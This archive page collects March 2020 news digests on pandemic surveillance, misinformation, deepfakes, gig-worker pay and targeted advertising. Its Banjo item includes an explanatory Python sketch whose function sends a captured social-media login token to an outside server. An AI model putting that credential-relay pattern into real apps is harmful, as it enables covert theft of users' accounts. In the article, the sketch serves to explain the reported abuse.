Archives: March 2020

As Coronavirus Surveillance Escalates, Personal Privacy Plummets

Tracking entire populations to combat the pandemic now could open the doors to more invasive forms of government snooping later.

In South Korea, government agencies are harnessing surveillance-camera footage, smartphone location data and credit card purchase records to help trace the recent movements of coronavirus patients and establish virus transmission chains. In Lombardy, Italy, the authorities are analyzing location data transmitted by citizens’ mobile phones to determine how many people are obeying a government lockdown order and the typical distances they move every day. About 40 percent are moving around “too much,” an official recently said. In Israel, the country’s internal security agency is poised to start using a cache of mobile phone location data — originally intended for counterterrorism operations — to try to pinpoint citizens who may have been exposed to the virus.

As countries around the world race to contain the pandemic, many are deploying digital surveillance tools as a means to exert social control, even turning security agency technologies on their own civilians. Health and law enforcement authorities are understandably eager to employ every tool at their disposal to try to hinder the virus — even as the surveillance efforts threaten to alter the precarious balance between public safety and personal privacy on a global scale. Yet ratcheting up surveillance to combat the pandemic now could permanently open the doors to more invasive forms of snooping later. It is a lesson Americans learned after the terrorist attacks of Sept. 11, 2001, civil liberties experts say. Nearly two decades later, law enforcement agencies have access to higher-powered surveillance systems, like fine-grained location tracking and facial recognition — technologies that may be repurposed to further political agendas like anti-immigration policies. Civil liberties experts warn that the public has little recourse to challenge these digital exercises of state power.

In Fast-Moving Pandemic, Sources of Falsehoods Spread by Text, Email, WhatsApp and TikTok

Misleading text messages claiming that President Trump was going to announce a national quarantine buzzed into cellphones across the country over the weekend, underscoring how rapidly false claims are spreading — and how often it is happening beyond the familiar misinformation vehicles of Facebook and Twitter. The false texts spread so widely that on Sunday night the White House’s National Security Council, fearing the texts were an attempt to spook the stock market as it opened Monday, decided to directly debunk the misleading claims in a Twitter post: “Text message rumors of a national #quarantine are FAKE. There is no national lockdown.” But by then the messages already had spread widely, as had similar ones both in the United States and Europe in recent days. Text messages, encrypted communication apps such as WhatsApp and some social media platforms have carried similarly alarming misinformation, much of it with the apparent goal of spurring people to overrun stores to buy basic items ahead of a new wave of government restrictions.

The one claiming that Trump was going to impose a national quarantine included the advice: “Stock up on whatever you guys need to make sure you have a two week supply of everything. Please forward to your network.” In fact, authorities have warned against aggressive buying that could disrupt supply chains and fuel panic. Trump addressed the misleading text messages at an afternoon news conference Monday, saying, “It could be that you have some foreign groups that are playing games.” On the possibility of a national quarantine, Trump said: “We haven’t determined to do that at all. … Hopefully we won’t have to.”

Surveillance Company Banjo Used a Secret Company and Fake Apps To Scrape Social Media

Banjo, an artificial intelligence firm that works with police, used a shadow company to create an array of Android and iOS apps that looked innocuous but were specifically designed to secretly scrape social media. The news signifies an abuse of data by a government contractor, with Banjo going far beyond what companies that scrape social networks usually do. Banjo created a secret company named Pink Unicorn Labs, according to three former Banjo employees, with two of them adding that the company developed the apps. This was done to avoid detection by social networks, two of the former employees said.

Three of the apps created by Pink Unicorn Labs were called “One Direction Fan App,” “EDM Fan App,” and “Formula Racing App.” Motherboard found these three apps on archive sites and downloaded and analyzed them, as did an independent expert. The apps — which appear to have been originally compiled in 2015 and, according to Google, were on the Play Store until 2016 — outwardly had no connection to Banjo, but an analysis of their code indicates connections to the company. This aspect of Banjo’s operation has some similarities with the Cambridge Analytica scandal, with multiple sources comparing the two incidents. […] The company has not publicly explained how it specifically scrapes social media apps. Motherboard found the apps developed by Pink Unicorn Labs included code for signing into Facebook, Twitter, Instagram, the Russian social network VK, Foursquare, Google Plus, and the Chinese social network Sina Weibo.
The apps could have scraped social media “by sending the saved login token to a server for Banjo to use later, or by using the app itself to scrape information,” reports Motherboard, noting that it’s not entirely clear which method Banjo used. “Motherboard found that the apps when opened made web requests to the domain ‘pulapi.com,’ likely referring to Pink Unicorn Labs, but the site that would provide a response to the app is currently down.”
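To make the two methods Motherboard floats concrete, here is a minimal Python sketch of each. This is illustration only, not Banjo’s actual code: the only detail taken from the report is the pulapi.com domain; the endpoint path, field names, and function names are all invented.

```python
import requests

# Assumed endpoint: only the domain pulapi.com appears in the report;
# the path and payload shape are invented for illustration.
COLLECTION_ENDPOINT = "https://pulapi.com/collect"

def relay_login_token(platform: str, token: str) -> None:
    """Method one: forward a token captured after an in-app social login,
    so a server can replay it later to scrape the account."""
    requests.post(COLLECTION_ENDPOINT,
                  json={"platform": platform, "token": token},
                  timeout=10)

def scrape_in_app(api_url: str, token: str) -> dict:
    """Method two: use the captured token from inside the app itself
    to pull the user's data directly."""
    resp = requests.get(api_url,
                        headers={"Authorization": f"Bearer {token}"},
                        timeout=10)
    return resp.json()
```

Either way, the fan apps’ social-login flow would be doing double duty: signing the user in, and handing the resulting credential to infrastructure the user never sees.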

Last weekend, Motherboard reported that Banjo signed a $20.7 million contract with Utah in 2019 that granted the company access to the state’s traffic, CCTV, and public safety cameras. “Banjo promises to combine that input with a range of other data such as satellites and social media posts to create a system that it claims alerts law enforcement of crimes or events in real-time.”

In Coronavirus Fight, China Gives Citizens a Color Code, With Red Flags

A new system uses software to dictate quarantines — and appears to send personal data to police, in a troubling precedent for automated social control. As China encourages people to return to work despite the coronavirus outbreak, it has begun a bold mass experiment in using data to regulate citizens’ lives — by requiring them to use software on their smartphones that dictates whether they should be quarantined or allowed into subways, malls and other public spaces. But a New York Times analysis of the software’s code found that the system does more than decide in real time whether someone poses a contagion risk. It also appears to share information with the police, setting a template for new forms of automated social control that could persist long after the epidemic subsides.

The Alipay Health Code, as China’s official news media has called the system, was first introduced in the eastern city of Hangzhou — a project by the local government with the help of Ant Financial, a sister company of the e-commerce giant Alibaba. People in China sign up through Ant’s popular wallet app, Alipay, and are assigned a color code — green, yellow or red — that indicates their health status. The system is already in use in 200 cities and is being rolled out nationwide, Ant says. Neither the company nor Chinese officials have explained in detail how the system classifies people. That has caused fear and bewilderment among those who are ordered to isolate themselves and have no idea why.
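The Times’s description implies a simple gatekeeping flow: a checkpoint scan checks the holder’s color and, per the code analysis, also reports the scan onward. Here is a minimal Python sketch of that flow; the color names come from the report, but since neither Ant nor officials have explained the classification rules, every function name, payload, and destination below is invented.

```python
from enum import Enum

class HealthCode(Enum):
    # The three colors are from the Times report; how people are
    # actually sorted into them has not been made public.
    GREEN = "green"
    YELLOW = "yellow"
    RED = "red"

def report_to_authorities(user_id: str, location: str, code: HealthCode) -> None:
    # Placeholder for the data-sharing behavior the Times' analysis
    # describes; the real recipient and payload are not public.
    print(f"report: user={user_id} location={location} code={code.value}")

def checkpoint_allows_entry(code: HealthCode, user_id: str, location: str) -> bool:
    """Hypothetical gate logic: every scan is reported onward,
    and only a green code opens the gate."""
    report_to_authorities(user_id, location, code)
    return code is HealthCode.GREEN
```

The troubling part is the side effect: even a routine subway scan would leave a record with the authorities, whether or not entry is granted.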

Airbnb ‘Surveillance Bugs To Make Sure Guests Behave’

“So this is creepy,” writes a Forbes cybersecurity reporter, saying Airbnb “has put aside the stories of hosts secretly spying on guests” to promote a new line of devices Forbes calls “surveillance bugs to make sure guests behave.”

“… we’re hurtling toward a world where almost everything we own is monitoring us in some way, and I’m not sure that’s actually going to be a safer world.”

First Use of Deepfakes In an Indian Election Campaign

The Delhi Bharatiya Janata Party (BJP) has partnered with political communications firm The Ideaz Factory to create “positive campaigns” using deepfakes to reach different linguistic voter bases, reports Nilesh Christopher via Motherboard. It marks the debut of deepfakes in election campaigns in India.

On February 7, a day ahead of the Legislative Assembly elections in Delhi, two videos of Delhi BJP President Manoj Tiwari criticizing the incumbent Delhi government of Arvind Kejriwal went viral on WhatsApp. In one video Tiwari spoke in English; in the other, he spoke in Haryanvi, a dialect of Hindi. “[Kejriwal] cheated us on the basis of promises. But now Delhi has a chance to change it all. Press the lotus button on February 8 to form the Modi-led government,” he said. One might assume this 44-second monologue was part of standard political outreach, but one thing about it was not standard: the videos were not real.

“Deepfake technology has helped us scale campaign efforts like never before,” Neelkant Bakshi, co-incharge of social media and IT for BJP Delhi, tells VICE. “The Haryanvi videos let us convincingly approach the target audience even if the candidate didn’t speak the language of the voter.” Tiwari’s fabricated video was used widely to dissuade the large Haryanvi-speaking migrant worker population in Delhi from voting for the rival political party. According to Bakshi, these deepfakes were distributed across 5,800 WhatsApp groups in the Delhi and NCR region, reaching approximately 15 million people.

‘These People Are Evil’: Drivers Speak Out Against Uber’s New Coronavirus Sick Leave Fund

Countless Uber drivers are now being pushed to the front lines of the coronavirus pandemic, transporting humans, food, supplies, and maybe soon Covid-19 testing kits as shelter-in-place rules cause demand for delivery services to spike. Yet despite their exposure to infection, gig workers lack paid sick leave, health benefits, or unemployment insurance because of their status as independent contractors.

Earlier this month, Uber, Lyft, and Amazon drivers protested the exclusion of gig workers from Silicon Valley’s monumental heave to protect itself from the coronavirus. As technology employees go remote, contractors are burdened with extra demands and no additional support. Uber, Lyft, and Amazon eventually agreed to compensate gig workers through ad hoc funds, but OneZero spoke to Uber drivers who say this is hardly a safety net. “I think I’m going to fall through the cracks,” said Kimberly James, a 46-year-old driver for Uber Eats in Atlanta, Georgia. After a series of devastating hardships, including losing her house in a fire, James has come to rely on food delivery platforms like Uber Eats and DoorDash to survive.

In 2012, James was diagnosed with an autoimmune disorder, and her weekly income of $400 means she cannot afford to get sick. Health officials have warned that the coronavirus is especially dangerous for immunocompromised people, so today James has no choice but to isolate indoors. One-time payouts are based on a person’s average daily earnings for the past six months. Someone making $28.57 per day is eligible for a payment of $400, the equivalent of 14 days of average pay, while someone earning $121.42 per day can receive $1,700, Uber says on its website. To qualify, drivers must have completed one trip in the 30 days before March 6, 2020, when the global program was first announced.
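Uber’s two published examples are consistent with a single rule: the one-time payout is fourteen days of a driver’s average daily earnings over the prior six months. A quick sketch to check the arithmetic (the function name is ours, not Uber’s):

```python
def one_time_payout(avg_daily_earnings: float, days_covered: int = 14) -> float:
    """Payout rule implied by Uber's examples: 14 days of average
    daily earnings, averaged over the prior six months."""
    return round(avg_daily_earnings * days_covered, 2)

# Both figures from Uber's website fall out of the same rule:
assert one_time_payout(28.57) == 399.98    # advertised as $400
assert one_time_payout(121.42) == 1699.88  # advertised as $1,700
```

In other words, the fund scales with past earnings, so the lowest-earning drivers, the ones with the thinnest cushion, also receive the smallest payouts.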

Why Don’t We Just Ban Targeted Advertising?

Google and Facebook, including their subsidiaries like Instagram and YouTube, make about 83 percent and 99 percent of their respective revenue from one thing: selling ads. It’s the same story with Twitter and other free sites and apps. More to the point, these companies are in the business of what’s called behavioral advertising, which allows companies to aim their marketing based on everything from users’ sexual orientations to their moods and menstrual cycles, as revealed by everything they do on their devices and every place they take them. It follows that most of the unsavory things the platforms do—boost inflammatory content, track our whereabouts, enable election manipulation, crush the news industry—stem from the goal of boosting ad revenues. Instead of trying to clean up all these messes one by one, the logic goes, why not just remove the underlying financial incentive? Targeting ads based on individual user data didn’t even really exist until the past decade. (Indeed, Google still makes many billions of dollars from ads tied to search terms, which aren’t user-specific.) What if companies simply weren’t allowed to do it anymore?

Let’s pretend it really happened. Imagine Congress passed a law tomorrow morning that banned companies from doing any ad microtargeting whatsoever. Close your eyes and picture what life would be like if the leading business model of the internet were banished from existence. How would things be different?

Many of the changes would be subtle. You could buy a pair of shoes on Amazon without Reebok ads following you for months. Perhaps you’d see some listings that you didn’t see before, for jobs or real estate. That’s especially likely if you’re African-American, or a woman, or a member of another disadvantaged group. You might come to understand that microtargeting had supercharged advertisers’ ability to discriminate, even when they weren’t trying to.